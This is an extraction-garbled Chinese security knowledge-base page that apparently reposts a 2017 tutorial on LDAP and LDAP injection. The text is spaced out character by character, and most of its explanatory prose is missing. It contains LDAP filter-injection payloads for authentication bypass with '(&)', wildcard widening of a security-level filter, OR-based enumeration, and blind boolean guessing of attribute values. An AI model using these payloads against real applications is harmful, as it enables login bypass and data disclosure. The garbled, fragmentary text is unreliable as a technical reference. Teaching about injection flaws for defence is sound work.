[20945] 2017-11-15_理解LDAP与LDAP注入

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2017-11-15_理解LDAP与LDAP注入 L D A P L D A P L e m o n S e c   2 0 1 7 - 1 1 - 1 5 h t t p : / / w w w . c h i n a u n i x . n e t / o l d _ j h / 4 9 / 5 9 3 6 6 0 . h t m l L D A P 访 | d n   : | | d c   : | | o u   : | | c n / u i d : / I D | L D A P   L D A P L D A P D B , T A B L E , R O W L D A P d c   o u g r o u p U I D d n : c n = h o n g l v , o u = b e i , o u = x i , o u = d o n g , d c = w a i b o , d c = c o m d c = w a i b o , d c = c o m o u = b e i , o u = x i , o u = d o n g c n = h o n g l v c n = s t a n , o u = l i n u x , o u = c o m p u t e r , d c = o u r s c h o o l , d c = o r g d n L D I F L D A P L D A P h t t p : / / w w w . m a n d r a k e s e c u r e . n e t / e n / d o c s / l d a p - a u t h . p h p 0 x 0 2   L D A P = ( ) J o h n 使 J o h n 便   L D A P   & ( ) 使   D a l l a s   J o h n 使   L D A P     &   d n : c n = s t a n , o u = l i n u x , o u = c o m p u t e r , d c = o u r s c h o o l , d c = o r g o b j e c t C l a s s o r g a n i z a t i o n a l P e r s o n c n : s t a n c n : s n : d e s c r i p t i o n : a   g o o d   b o y ( g i v e n N a m e = J o h n )   ( & ( g i v e n N a m e = J o h n ) ( l = D a l l a s ) )
! ( ) J o h n 使 J o h n !   使 * 使 使 使 t i t l e J o 使 J o e g :   D a l l a s     A u s t i n J o h n 使 0 x 0 3   L D A P L D A P S Q L L D A P W e b 使 广 L D A P A D A M O p e n L D A P 3 . 1   v a l u e ) ( i n j e c t e d _ f i l t e r   O p e n L D A P A D A M v a l u e ) ( i n j e c t e d _ f i l t e r ) O p e n L D A P v a l u e ) ( i n j e c t e d _ f i l t e r ) ) ( & ( 1 = 0 p a y l o a d L D A P 便 L D A P v a l u e ) ( i n j e c t e d _ f i l t e r 3 . 2   A N D ( ! g i v e n N a m e = J o h n ) ( t i t l e = * ) ( g i v e n N a m e = J o * ) ( & ( g i v e n N a m e = J o h n ) ( | ( l = D a l l a s ) ( l = A u s t i n ) ) ) ( a t t r i b u t e = v a l u e ) ( a t t r i b u t e = v a l u e ) ( i n j e c t e d _ f i l t e r ) ( | ( a t t r i b u t e = v a l u e ) ( s e c o n d _ f i l t e r ) )   o r   ( & ( a t t r i b u t e = v a l u e ) ( s e c o n d _ f i l t e r ) ) ( & ( a t t r i b u t e = v a l u e ) ( i n j e c t e d _ f i l t e r ) )   ( s e c o n d _ f i l t e r ) ( & ( a t t r i b u t e = v a l u e ) ( i n j e c t e d _ f i l t e r ) ) ( & ( 1 = 0 ) ( s e c o n d _ f i l t e r ) ) ( & ( a t t r i b u t e = v a l u e ) ( i n j e c t e d _ f i l t e r ) ( s e c o n d _ f i l t e r ) )
& L D A P V a l u e 1 v a l u e 2 L D A P 使 3 . 2 . 1   访 r 0 0 t g r o k p a s s w o r d U n a m e = s l i s b e r g e r ) ( & ) ) L D A P ( & ( U S E R = s l i d b e r g e r ) ( & ) ) , 3 . 2 . 2   d o c u m e n t l o w d o c u m e n t ) ( s e c u r i t y _ l e v e l = * ) ) ( & ( d i r e c t o r y = d o c u m e n t s L D A P 3 . 3   O R | L D A P V a l u e 1 v a l u e 2 L D A P 使 A N D 3 . 4   L D A P 3 . 4 . 1   A N D W e b L D A P E p s o n ) ( o b j e c t C l a s s = ) ) ( & ( o b j e c t C l a s s = v o i d o b j e c t C l a s s = * o b j e c t c l a s s L D A P 使 T R U E / F A L S E 访 3 . 4 . 2   O R A N D 使 O R ( & ( p a r a m e t e r 1 = v a l u e 1 ) ( p a r a m e t e r 2 = v a l u e 2 ) ) ( & ( U S E R = U n a m e ) ( P A S S W O R D = P w d ) )   ( & ( U S E R =   s l i s b e r g e r ) ( & ) ( P A S S W O R D = P w d ) ) ( & ( d i r e c t o r y = d o c u m e n t ) ( s e c u r i t y _ l e v e l = l o w ) )   ( & ( d i r e c t o r y = d o c u m e n t s ) ( s e c u r i t y _ l e v e l = * ) ) ( & ( d i r e c r o t y = d o c u m e n t s ) ( s e c u r i t y _ l e v e l = l o w ) ) ( & ( d i r e c t o r y = d o c u m e n t s ) ( s e c u r i t y _ l e v e l = * ) ) ( | ( p a r a m e t e r 1 = v a l u e 1 ) ( p a r a m e t e r 2 = v a l u e 2 ) ) ( & ( o b j e c t C l a s s = p r i n t e r ) ( t y p e = E p s o n * ) ) ( & ( o b j e c t C l a s s = p r i n t e r ) ( t y p e = E p s o n * ) ) ( & ( o b j e c t C l a s s = * ) ( o b j e c t C l a s s = * ) ) ( & ( o b j e c t C l a s s = v o i d ) ( t y p e = E p s o n * ) )
3 . 4 . 3   使 T R U E / F A L S E b o o l e a n i z a t i o n d e p a r t m e n t ( & ( i d p r i n t e r = H P L a s e r J e t 2 1 0 0 ) ( d e p a r t m e n t = f a * ) ) ( o b j e c t = p r i n t e r ) ) M Y S Q L 使 使 a n y w h e r e ( & ( i d p r i n t e r = H P L a s e r J e t 2 1 0 0 ) ( d e p a r t m e n t = * n * ) ) ( o b j e c t = p r i n t e r ) ) d e p a r t m e n t b n 0 x 0 4   L D A P L D A P L D A P h t t p : / / b l o g . c s d n . n e t / q q _ 1 9 8 7 6 1 3 1 / a r t i c l e / d e t a i l s / 5 0 5 7 7 3 5 5 ( & ( i d p r i n t e r = H P L a s e r J e t 2 1 0 0 ) ( d e p a r t m e n t = a * ) ) ( o b j e c t = p r i n t e r ) ) ( & ( i d p r i n t e r = H P L a s e r J e t 2 1 0 0 ) ( d e p a r t m e n t = f * ) ) ( o b j e c t = p r i n t e r ) ) ( & ( i d p r i n t e r = H P L a s e r J e t 2 1 0 0 ) ( d e p a r t m e n t = * b * ) ) ( o b j e c t = p r i n t e r ) )
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则